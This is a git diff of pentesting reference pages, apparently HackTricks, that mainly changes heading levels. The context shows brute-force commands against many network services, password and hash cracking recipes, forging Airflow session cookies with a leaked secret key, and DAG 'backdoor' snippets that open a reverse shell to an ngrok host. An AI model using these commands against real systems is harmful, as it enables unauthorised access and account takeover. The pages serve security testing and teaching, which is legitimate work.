nmap -sV --script imap-brute -p <PORT> <IP> nmap -sV --script imap-brute -p <PORT> <IP>
``` ```
### IRC ## IRC
```bash ```bash
nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP> nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP>
``` ```
### ISCSI ## ISCSI
```bash ```bash
nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 <IP> nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 <IP>
``` ```
### JWT ## JWT
```bash ```bash
#hashcat #hashcat
@ -218,26 +216,26 @@ python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1w
jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6 jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6
``` ```
### LDAP ## LDAP
```bash ```bash
nmap --script ldap-brute -p 389 <IP> nmap --script ldap-brute -p 389 <IP>
``` ```
### MQTT ## MQTT
``` ```
ncrack mqtt://127.0.0.1 --user test P /root/Desktop/pass.txt -v ncrack mqtt://127.0.0.1 --user test P /root/Desktop/pass.txt -v
``` ```
### Mongo ## Mongo
```bash ```bash
nmap -sV --script mongodb-brute -n -p 27017 <IP> nmap -sV --script mongodb-brute -n -p 27017 <IP>
use auxiliary/scanner/mongodb/mongodb_login use auxiliary/scanner/mongodb/mongodb_login
``` ```
### MySQL ## MySQL
```bash ```bash
# hydra # hydra
@ -250,7 +248,7 @@ msf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false
medusa -h <IP/Host> -u <username> -P <password_list> <-f | to stop medusa on first success attempt> -t <threads> -M mysql medusa -h <IP/Host> -u <username> -P <password_list> <-f | to stop medusa on first success attempt> -t <threads> -M mysql
``` ```
### OracleSQL ## OracleSQL
```bash ```bash
patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017 patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017
@ -286,14 +284,14 @@ pip3 install cx_Oracle --upgrade
nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30 nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30
``` ```
### POP ## POP
```bash ```bash
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V
``` ```
### PostgreSQL ## PostgreSQL
```bash ```bash
hydra -L /root/Desktop/user.txt P /root/Desktop/pass.txt <IP> postgres hydra -L /root/Desktop/user.txt P /root/Desktop/pass.txt <IP> postgres
@ -304,7 +302,7 @@ use auxiliary/scanner/postgres/postgres_login
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP> nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
``` ```
### PPTP ## PPTP
You can download the `.deb` package to install from [https://http.kali.org/pool/main/t/thc-pptp-bruter/](https://http.kali.org/pool/main/t/thc-pptp-bruter/) You can download the `.deb` package to install from [https://http.kali.org/pool/main/t/thc-pptp-bruter/](https://http.kali.org/pool/main/t/thc-pptp-bruter/)
@ -313,14 +311,14 @@ sudo dpkg -i thc-pptp-bruter*.deb #Install the package
cat rockyou.txt | thc-pptp-bruter u <Username> <IP> cat rockyou.txt | thc-pptp-bruter u <Username> <IP>
``` ```
### RDP ## RDP
```bash ```bash
ncrack -vv --user <User> -P pwds.txt rdp://<IP> ncrack -vv --user <User> -P pwds.txt rdp://<IP>
hydra -V -f -L <userslist> -P <passwlist> rdp://<IP> hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>
``` ```
### Redis ## Redis
```bash ```bash
msf> use auxiliary/scanner/redis/redis_login msf> use auxiliary/scanner/redis/redis_login
@ -328,19 +326,19 @@ nmap --script redis-brute -p 6379 <IP>
hydra P /path/pass.txt redis://<IP>:<PORT> # 6379 is the default hydra P /path/pass.txt redis://<IP>:<PORT> # 6379 is the default
``` ```
### Rexec ## Rexec
```bash ```bash
hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -V hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -V
``` ```
### Rlogin ## Rlogin
```bash ```bash
hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V
``` ```
### Rsh ## Rsh
```bash ```bash
hydra -L <Username_list> rsh://<Victim_IP> -v -V hydra -L <Username_list> rsh://<Victim_IP> -v -V
@ -348,19 +346,19 @@ hydra -L <Username_list> rsh://<Victim_IP> -v -V
[http://pentestmonkey.net/tools/misc/rsh-grind](http://pentestmonkey.net/tools/misc/rsh-grind) [http://pentestmonkey.net/tools/misc/rsh-grind](http://pentestmonkey.net/tools/misc/rsh-grind)
### Rsync ## Rsync
```bash ```bash
nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP> nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>
``` ```
### RTSP ## RTSP
```bash ```bash
hydra -l root -P passwords.txt <IP> rtsp hydra -l root -P passwords.txt <IP> rtsp
``` ```
### SNMP ## SNMP
```bash ```bash
msf> use auxiliary/scanner/snmp/snmp_login msf> use auxiliary/scanner/snmp/snmp_login
@ -369,27 +367,27 @@ onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp
``` ```
### SMB ## SMB
```bash ```bash
nmap --script smb-brute -p 445 <IP> nmap --script smb-brute -p 445 <IP>
hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1 hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
``` ```
### SMTP ## SMTP
```bash ```bash
hydra -l <username> -P /path/to/passwords.txt <IP> smtp -V hydra -l <username> -P /path/to/passwords.txt <IP> smtp -V
hydra -l <username> -P /path/to/passwords.txt -s 587 <IP> -S -v -V #Port 587 for SMTP with SSL hydra -l <username> -P /path/to/passwords.txt -s 587 <IP> -S -v -V #Port 587 for SMTP with SSL
``` ```
### SOCKS ## SOCKS
```bash ```bash
nmap -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 <IP> nmap -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 <IP>
``` ```
### SQL Server ## SQL Server
```bash ```bash
#Use the NetBIOS name of the machine as domain #Use the NetBIOS name of the machine as domain
@ -400,7 +398,7 @@ nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=cust
msf> use auxiliary/scanner/mssql/mssql_login #Be carefull, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT msf> use auxiliary/scanner/mssql/mssql_login #Be carefull, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT
``` ```
### SSH ## SSH
```bash ```bash
hydra -l root -P passwords.txt [-t 32] <IP> ssh hydra -l root -P passwords.txt [-t 32] <IP> ssh
@ -409,7 +407,7 @@ medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh
patator ssh_login host=<ip> port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed' patator ssh_login host=<ip> port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'
``` ```
### Telnet ## Telnet
```bash ```bash
hydra -l root -P passwords.txt [-t 32] <IP> telnet hydra -l root -P passwords.txt [-t 32] <IP> telnet
@ -417,7 +415,7 @@ ncrack -p 23 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M telnet medusa -u root -P 500-worst-passwords.txt -h <IP> -M telnet
``` ```
### VNC ## VNC
```bash ```bash
hydra -L /root/Desktop/user.txt P /root/Desktop/pass.txt -s <PORT> <IP> vnc hydra -L /root/Desktop/user.txt P /root/Desktop/pass.txt -s <PORT> <IP> vnc
@ -432,15 +430,15 @@ set RHOSTS <ip>
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst
``` ```
### Winrm ## Winrm
```bash ```bash
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
``` ```
## Local # Local
### Online cracking databases ## Online cracking databases
* [~~http://hashtoolkit.com/reverse-hash?~~](http://hashtoolkit.com/reverse-hash?) (MD5 & SHA1) * [~~http://hashtoolkit.com/reverse-hash?~~](http://hashtoolkit.com/reverse-hash?) (MD5 & SHA1)
* [https://www.onlinehashcrack.com/](https://www.onlinehashcrack.com) (Hashes, WPA2 captures, and archives MSOffice, ZIP, PDF...) * [https://www.onlinehashcrack.com/](https://www.onlinehashcrack.com) (Hashes, WPA2 captures, and archives MSOffice, ZIP, PDF...)
@ -455,7 +453,7 @@ crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
Check this out before trying to bruteforce a Hash. Check this out before trying to bruteforce a Hash.
### ZIP ## ZIP
```bash ```bash
#sudo apt-get install fcrackzip #sudo apt-get install fcrackzip
@ -473,7 +471,7 @@ hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt
.\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt #Incremental attack .\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt #Incremental attack
``` ```
### 7z ## 7z
```bash ```bash
cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z
@ -486,7 +484,7 @@ apt-get install libcompress-raw-lzma-perl
./7z2john.pl file.7z > 7zhash.john ./7z2john.pl file.7z > 7zhash.john
``` ```
### PDF ## PDF
```bash ```bash
apt-get install pdfcrack apt-get install pdfcrack
@ -497,7 +495,7 @@ sudo apt-get install qpdf
qpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf qpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf
``` ```
### JWT ## JWT
```bash ```bash
git clone https://github.com/Sjord/jwtcrack.git git clone https://github.com/Sjord/jwtcrack.git
@ -511,7 +509,7 @@ python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5h
john jwt.john #It does not work with Kali-John john jwt.john #It does not work with Kali-John
``` ```
### NTLM cracking ## NTLM cracking
```bash ```bash
Format:USUARIO:ID:HASH_LM:HASH_NT::: Format:USUARIO:ID:HASH_LM:HASH_NT:::
@ -519,7 +517,7 @@ john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes
hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot
``` ```
### Keepass ## Keepass
```bash ```bash
sudo apt-get install -y kpcli #Install keepass tools like keepass2john sudo apt-get install -y kpcli #Install keepass tools like keepass2john
@ -529,7 +527,7 @@ keepass2john -k <file-password> file.kdbx > hash # The keepas is also using a fi
john --wordlist=/usr/share/wordlists/rockyou.txt hash john --wordlist=/usr/share/wordlists/rockyou.txt hash
``` ```
### Keberoasting ## Keberoasting
```bash ```bash
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
@ -537,9 +535,9 @@ hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi ./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
``` ```
### Lucks image ## Lucks image
#### Method 1 ### Method 1
Install: [https://github.com/glv2/bruteforce-luks](https://github.com/glv2/bruteforce-luks) Install: [https://github.com/glv2/bruteforce-luks](https://github.com/glv2/bruteforce-luks)
@ -550,7 +548,7 @@ ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt mount /dev/mapper/mylucksopen /mnt
``` ```
#### Method 2 ### Method 2
```bash ```bash
cryptsetup luksDump backup.img #Check that the payload offset is set to 4096 cryptsetup luksDump backup.img #Check that the payload offset is set to 4096
@ -563,7 +561,7 @@ mount /dev/mapper/mylucksopen /mnt
Another Luks BF tutorial: [http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1](http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1) Another Luks BF tutorial: [http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1](http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1)
### Mysql ## Mysql
```bash ```bash
#John hash format #John hash format
@ -571,14 +569,14 @@ Another Luks BF tutorial: [http://blog.dclabs.com.br/2020/03/bruteforcing-linux-
dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d
``` ```
### PGP/GPG Private key ## PGP/GPG Private key
```bash ```bash
gpg2john private_pgp.key #This will generate the hash, save it in a file gpg2john private_pgp.key #This will generate the hash, save it in a file
john --wordlist=/usr/share/wordlists/rockyou.txt ./hash john --wordlist=/usr/share/wordlists/rockyou.txt ./hash
``` ```
### Open Office Pwd Protected Column ## Open Office Pwd Protected Column
If you have xlsx file with a column protected by password you can unprotect it: If you have xlsx file with a column protected by password you can unprotect it:
@ -594,7 +592,7 @@ hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UV
zip -r file.xls . zip -r file.xls .
``` ```
### PFX Certificates ## PFX Certificates
```bash ```bash
# From https://github.com/Ridter/p12tool # From https://github.com/Ridter/p12tool
@ -603,18 +601,18 @@ zip -r file.xls .
crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx
``` ```
## Tools # Tools
**Hash examples:** [https://openwall.info/wiki/john/sample-hashes](https://openwall.info/wiki/john/sample-hashes) **Hash examples:** [https://openwall.info/wiki/john/sample-hashes](https://openwall.info/wiki/john/sample-hashes)
### Hash-identifier ## Hash-identifier
```bash ```bash
hash-identifier hash-identifier
> <HASH> > <HASH>
``` ```
### John mutation ## John mutation
Read _**/etc/john/john.conf**_ and configure it Read _**/etc/john/john.conf**_ and configure it
@ -623,7 +621,7 @@ john --wordlist=words.txt --rules --stdout > w_mutated.txt
john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules
``` ```
### Hashcat ## Hashcat
```bash ```bash
hashcat --example-hashes | grep -B1 -A2 "NTLM" hashcat --example-hashes | grep -B1 -A2 "NTLM"

View file

@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Burp Suite # Basic Payloads
## Basic Payloads
* **Simple List:** Just a list containing an entry in each line * **Simple List:** Just a list containing an entry in each line
* **Runtime File:** A list read in runtime (not loaded in memory). For supporting big lists. * **Runtime File:** A list read in runtime (not loaded in memory). For supporting big lists.

View file

@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Certificates # What is a Certificate
## What is a Certificate
In cryptography, a **public key certificate,** also known as a **digital certificate** or **identity certificate,** is an electronic document used to prove the ownership of a public key. The certificate includes information about the key, information about the identity of its owner \(called the subject\), and the digital signature of an entity that has verified the certificate's contents \(called the issuer\). If the signature is valid, and the software examining the certificate trusts the issuer, then it can use that key to communicate securely with the certificate's subject. In cryptography, a **public key certificate,** also known as a **digital certificate** or **identity certificate,** is an electronic document used to prove the ownership of a public key. The certificate includes information about the key, information about the identity of its owner \(called the subject\), and the digital signature of an entity that has verified the certificate's contents \(called the issuer\). If the signature is valid, and the software examining the certificate trusts the issuer, then it can use that key to communicate securely with the certificate's subject.
@ -27,7 +25,7 @@ In a typical [public-key infrastructure](https://en.wikipedia.org/wiki/Public-ke
The most common format for public key certificates is defined by [X.509](https://en.wikipedia.org/wiki/X.509). Because X.509 is very general, the format is further constrained by profiles defined for certain use cases, such as [Public Key Infrastructure \(X.509\)](https://en.wikipedia.org/wiki/PKIX) as defined in RFC 5280. The most common format for public key certificates is defined by [X.509](https://en.wikipedia.org/wiki/X.509). Because X.509 is very general, the format is further constrained by profiles defined for certain use cases, such as [Public Key Infrastructure \(X.509\)](https://en.wikipedia.org/wiki/PKIX) as defined in RFC 5280.
## x509 Common Fields # x509 Common Fields
* **Version Number:** Version of x509 format. * **Version Number:** Version of x509 format.
* **Serial Number**: Used to uniquely identify the certificate within a CA's systems. In particular this is used to track revocation information. * **Serial Number**: Used to uniquely identify the certificate within a CA's systems. In particular this is used to track revocation information.
@ -69,7 +67,7 @@ The most common format for public key certificates is defined by [X.509](https:/
* Address of the **OCSP responder from where revocation of this certificate** can be checked \(OCSP access method\). * Address of the **OCSP responder from where revocation of this certificate** can be checked \(OCSP access method\).
* **CRL Distribution Points**: This extension identifies the location of the CRL from which the revocation of this certificate can be checked. The application that processes the certificate can get the location of the CRL from this extension, download the CRL and then check the revocation of this certificate. * **CRL Distribution Points**: This extension identifies the location of the CRL from which the revocation of this certificate can be checked. The application that processes the certificate can get the location of the CRL from this extension, download the CRL and then check the revocation of this certificate.
### Difference between OSCP and CRL Distribution Points ## Difference between OSCP and CRL Distribution Points
**OCSP** \(RFC 2560\) is a standard protocol that consists of an **OCSP client and an OCSP responder**. This protocol **determines revocation status of a given digital public-key certificate** **without** having to **download** the **entire CRL**. **OCSP** \(RFC 2560\) is a standard protocol that consists of an **OCSP client and an OCSP responder**. This protocol **determines revocation status of a given digital public-key certificate** **without** having to **download** the **entire CRL**.
**CRL** is the **traditional method** of checking certificate validity. A **CRL provides a list of certificate serial numbers** that have been revoked or are no longer valid. CRLs let the verifier check the revocation status of the presented certificate while verifying it. CRLs are limited to 512 entries. **CRL** is the **traditional method** of checking certificate validity. A **CRL provides a list of certificate serial numbers** that have been revoked or are no longer valid. CRLs let the verifier check the revocation status of the presented certificate while verifying it. CRLs are limited to 512 entries.

View file

@ -17,21 +17,19 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Apache Airflow # Basic Information
## Basic Information
[**Apache Airflow**](https://airflow.apache.org) is used for the **scheduling and **_**orchestration of data pipelines**_** or workflows**. Orchestration of data pipelines refers to the sequencing, coordination, scheduling, and managing complex **data pipelines from diverse sources**. These data pipelines deliver data sets that are ready for consumption either by business intelligence applications and data science, machine learning models that support big data applications. [**Apache Airflow**](https://airflow.apache.org) is used for the **scheduling and **_**orchestration of data pipelines**_** or workflows**. Orchestration of data pipelines refers to the sequencing, coordination, scheduling, and managing complex **data pipelines from diverse sources**. These data pipelines deliver data sets that are ready for consumption either by business intelligence applications and data science, machine learning models that support big data applications.
Basically, Apache Airflow will allow you to **schedule de execution of code when something** (event, cron) **happens**. Basically, Apache Airflow will allow you to **schedule de execution of code when something** (event, cron) **happens**.
## Local Lab # Local Lab
### Docker-Compose ## Docker-Compose
You can use the **docker-compose config file from** [**https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml**](https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml) to launch a complete apache airflow docker environment. (If you are in MacOS make sure to give at least 6GB of RAM to the docker VM). You can use the **docker-compose config file from** [**https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml**](https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml) to launch a complete apache airflow docker environment. (If you are in MacOS make sure to give at least 6GB of RAM to the docker VM).
### Minikube ## Minikube
One easy way to **run apache airflo**w is to run it **with minikube**: One easy way to **run apache airflo**w is to run it **with minikube**:
@ -45,7 +43,7 @@ helm install airflow-release airflow-stable/airflow
helm delete airflow-release helm delete airflow-release
``` ```
## Airflow Configuration # Airflow Configuration
Airflow might store **sensitive information** in its configuration or you can find weak configurations in place: Airflow might store **sensitive information** in its configuration or you can find weak configurations in place:
@ -53,7 +51,7 @@ Airflow might store **sensitive information** in its configuration or you can fi
[airflow-configuration.md](airflow-configuration.md) [airflow-configuration.md](airflow-configuration.md)
{% endcontent-ref %} {% endcontent-ref %}
## Airflow RBAC # Airflow RBAC
Before start attacking Airflow you should understand **how permissions work**: Before start attacking Airflow you should understand **how permissions work**:
@ -61,9 +59,9 @@ Before start attacking Airflow you should understand **how permissions work**:
[airflow-rbac.md](airflow-rbac.md) [airflow-rbac.md](airflow-rbac.md)
{% endcontent-ref %} {% endcontent-ref %}
## Attacks # Attacks
### Web Console Enumeration ## Web Console Enumeration
If you have **access to the web console** you might be able to access some or all of the following information: If you have **access to the web console** you might be able to access some or all of the following information:
@ -73,7 +71,7 @@ If you have **access to the web console** you might be able to access some or al
* List **users & roles** * List **users & roles**
* **Code of each DAG** (which might contain interesting info) * **Code of each DAG** (which might contain interesting info)
### Privilege Escalation ## Privilege Escalation
If the **`expose_config`** configuration is set to **True**, from the **role User** and **upwards** can **read** the **config in the web**. In this config, the **`secret_key`** appears, which means any user with this valid they can **create its own signed cookie to impersonate any other user account**. If the **`expose_config`** configuration is set to **True**, from the **role User** and **upwards** can **read** the **config in the web**. In this config, the **`secret_key`** appears, which means any user with this valid they can **create its own signed cookie to impersonate any other user account**.
@ -81,7 +79,7 @@ If the **`expose_config`** configuration is set to **True**, from the **role Use
flask-unsign --sign --secret '<secret_key>' --cookie "{'_fresh': True, '_id': '12345581593cf26619776d0a1e430c412171f4d12a58d30bef3b2dd379fc8b3715f2bd526eb00497fcad5e270370d269289b65720f5b30a39e5598dad6412345', '_permanent': True, 'csrf_token': '09dd9e7212e6874b104aad957bbf8072616b8fbc', 'dag_status_filter': 'all', 'locale': 'en', 'user_id': '1'}" flask-unsign --sign --secret '<secret_key>' --cookie "{'_fresh': True, '_id': '12345581593cf26619776d0a1e430c412171f4d12a58d30bef3b2dd379fc8b3715f2bd526eb00497fcad5e270370d269289b65720f5b30a39e5598dad6412345', '_permanent': True, 'csrf_token': '09dd9e7212e6874b104aad957bbf8072616b8fbc', 'dag_status_filter': 'all', 'locale': 'en', 'user_id': '1'}"
``` ```
### DAG Backdoor (RCE in Airflow worker) ## DAG Backdoor (RCE in Airflow worker)
If you have **write access** to the place where the **DAGs are saved**, you can just **create one** that will send you a **reverse shell.**\ If you have **write access** to the place where the **DAGs are saved**, you can just **create one** that will send you a **reverse shell.**\
Note that this reverse shell is going to be executed inside an **airflow worker container**: Note that this reverse shell is going to be executed inside an **airflow worker container**:
@ -125,7 +123,7 @@ with DAG(
) )
``` ```
### DAG Backdoor (RCE in Airflow scheduler) ## DAG Backdoor (RCE in Airflow scheduler)
If you set something to be **executed in the root of the code**, at the moment of this writing, it will be **executed by the scheduler** after a couple of seconds after placing it inside the DAG's folder. If you set something to be **executed in the root of the code**, at the moment of this writing, it will be **executed by the scheduler** after a couple of seconds after placing it inside the DAG's folder.
@ -153,7 +151,7 @@ with DAG(
op_kwargs={"rhost":"2.tcp.ngrok.io", "port": 144} op_kwargs={"rhost":"2.tcp.ngrok.io", "port": 144}
``` ```
### DAG Creation ## DAG Creation
If you manage to **compromise a machine inside the DAG cluster**, you can create new **DAGs scripts** in the `dags/` folder and they will be **replicated in the rest of the machines** inside the DAG cluster. If you manage to **compromise a machine inside the DAG cluster**, you can create new **DAGs scripts** in the `dags/` folder and they will be **replicated in the rest of the machines** inside the DAG cluster.

View file

@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Airflow Configuration # Configuration File
## Configuration File
**Apache Airflow** generates a **config file** in all the airflow machines called **`airflow.cfg`** in the home of the airflow user. This config file contains configuration information and **might contain interesting and sensitive information.** **Apache Airflow** generates a **config file** in all the airflow machines called **`airflow.cfg`** in the home of the airflow user. This config file contains configuration information and **might contain interesting and sensitive information.**
@ -32,7 +30,7 @@ If you have **access to some machine inside the airflow env**, check the **envir
Some interesting values to check when reading the config file: Some interesting values to check when reading the config file:
### \[api] ## \[api]
* **`access_control_allow_headers`**: This indicates the **allowed** **headers** for **CORS** * **`access_control_allow_headers`**: This indicates the **allowed** **headers** for **CORS**
* **`access_control_allow_methods`**: This indicates the **allowed methods** for **CORS** * **`access_control_allow_methods`**: This indicates the **allowed methods** for **CORS**
@ -47,12 +45,12 @@ Some interesting values to check when reading the config file:
* You can also **create you own authentication** method with python. * You can also **create you own authentication** method with python.
* **`google_key_path`:** Path to the **GCP service account key** * **`google_key_path`:** Path to the **GCP service account key**
### **\[atlas]** ## **\[atlas]**
* **`password`**: Atlas password * **`password`**: Atlas password
* **`username`**: Atlas username * **`username`**: Atlas username
### \[celery] ## \[celery]
* **`flower_basic_auth`** : Credentials (_user1:password1,user2:password2_) * **`flower_basic_auth`** : Credentials (_user1:password1,user2:password2_)
* **`result_backend`**: Postgres url which may contain **credentials**. * **`result_backend`**: Postgres url which may contain **credentials**.
@ -60,39 +58,39 @@ Some interesting values to check when reading the config file:
* **`ssl_cert`**: Path to the cert * **`ssl_cert`**: Path to the cert
* **`ssl_key`**: Path to the key * **`ssl_key`**: Path to the key
### \[core] ## \[core]
* **`dag_discovery_safe_mode`**: Enabled by default. When discovering DAGs, ignore any files that dont contain the strings `DAG` and `airflow`. * **`dag_discovery_safe_mode`**: Enabled by default. When discovering DAGs, ignore any files that dont contain the strings `DAG` and `airflow`.
* **`fernet_key`**: Key to store encrypted variables (symmetric) * **`fernet_key`**: Key to store encrypted variables (symmetric)
* **`hide_sensitive_var_conn_fields`**: Enabled by default, hide sensitive info of connections. * **`hide_sensitive_var_conn_fields`**: Enabled by default, hide sensitive info of connections.
* **`security`**: What security module to use (for example kerberos) * **`security`**: What security module to use (for example kerberos)
### \[dask] ## \[dask]
* **`tls_ca`**: Path to ca * **`tls_ca`**: Path to ca
* **`tls_cert`**: Part to the cert * **`tls_cert`**: Part to the cert
* **`tls_key`**: Part to the tls key * **`tls_key`**: Part to the tls key
### \[kerberos] ## \[kerberos]
* **`ccache`**: Path to ccache file * **`ccache`**: Path to ccache file
* **`forwardable`**: Enabled by default * **`forwardable`**: Enabled by default
### \[logging] ## \[logging]
* **`google_key_path`**: Path to GCP JSON creds. * **`google_key_path`**: Path to GCP JSON creds.
### \[secrets] ## \[secrets]
* **`backend`**: Full class name of secrets backend to enable * **`backend`**: Full class name of secrets backend to enable
* **`backend_kwargs`**: The backend\_kwargs param is loaded into a dictionary and passed to **init** of secrets backend class. * **`backend_kwargs`**: The backend\_kwargs param is loaded into a dictionary and passed to **init** of secrets backend class.
### \[smtp] ## \[smtp]
* **`smtp_password`**: SMTP password * **`smtp_password`**: SMTP password
* **`smtp_user`**: SMTP user * **`smtp_user`**: SMTP user
### \[webserver] ## \[webserver]
* **`cookie_samesite`**: By default it's **Lax**, so it's already the weakest possible value * **`cookie_samesite`**: By default it's **Lax**, so it's already the weakest possible value
* **`cookie_secure`**: Set **secure flag** on the the session cookie * **`cookie_secure`**: Set **secure flag** on the the session cookie
@ -103,7 +101,7 @@ Some interesting values to check when reading the config file:
* **`web_server_ssl_key`**: **Path** to the **SSL** **Key** * **`web_server_ssl_key`**: **Path** to the **SSL** **Key**
* **`x_frame_enabled`**: Default is **True**, so by default clickjacking isn't possible * **`x_frame_enabled`**: Default is **True**, so by default clickjacking isn't possible
### Web Authentication ## Web Authentication
By default **web authentication** is specified in the file **`webserver_config.py`** and is configured as By default **web authentication** is specified in the file **`webserver_config.py`** and is configured as

View file

@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Airflow RBAC # RBAC
## RBAC
